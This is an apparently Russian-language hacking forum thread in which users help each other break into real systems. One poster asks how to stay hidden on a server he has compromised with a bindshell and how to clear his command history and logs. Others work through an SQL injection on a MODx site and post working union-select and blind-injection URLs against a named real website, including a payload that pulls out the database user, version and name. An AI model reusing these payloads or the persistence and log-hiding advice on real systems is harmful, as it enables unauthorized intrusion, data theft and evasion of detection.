Ваши вопросы по уязвимостям.

Не, ну шутки шутками. Объясните мне пожалуйста, почему меня пустило в админку введением одного логина: root. Поле пароля пустое. Это недоработка webmina? Или я чтото сделал своими слабенькими манипуляциями?

 

А пароль вообще стоял?

 

Поглядел логи chkrootkit на порутаном серве и увидел
Bindshell infected (port 31337 (мой бинд)) , но я забиндил ещё один порт 31333 и он его почемуто не пропас,хотя в нетсат он ЛИСЕН. Работаю по второму порту.
Как закрыть забинденный мной порт и без палева закрепиться в системе при таких условиях?
И ещё,где в линухе лежит исторя команд и лог моих подключений на мои порты?
В var/log не нашёл =(

 

Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык

(strtolower не должен влиять на Null байт по идее?)

 

Почитай данную статью . =)

 

Что-то не получается заюзать (с точкой), нужен пример с POST'ом

 

а самому подумать?
в %00 - нет буквенных символов , чтоб переводить в нижний регистр

 

Увереность не помешает

 

короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentvalues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;


вводил в поле поиска - ">'>sc"><

 

скуль, не? причем с кривым экранированием

 

ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю

 

читай маны
например тут:

или тут:

 

Wordpress 2.5

При обращении к файлу

http://localhost/blog/wp-includes/class-feed.php

имеем

Можно это как-то раскрутить, без параметра?

 

Тебе вот сюда .

 

я думаю, что нет

 

Прошу помощи. Нашёл следующую скулю:

Code:

http://www.bmx.ru/files.php?id=1'

Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:

Code:

http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--

Пробую подобрать дальше, выскакивает другая ошибка:

Это не операбельно, или у меня совсем мозг не работает уже?

 

думаю ее просто нужно крутить как слепую

Code:

http://www.bmx.ru/files.php?id=1+and+1=1+--+

Code:

http://www.bmx.ru/files.php?id=1+and+1=0+--+

 

Я тоже об этом думал. Раз нет других вариантов - буду так. Большое спасибо!

 

keng
как вариант:

Code:

http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6--

 

Благодарю!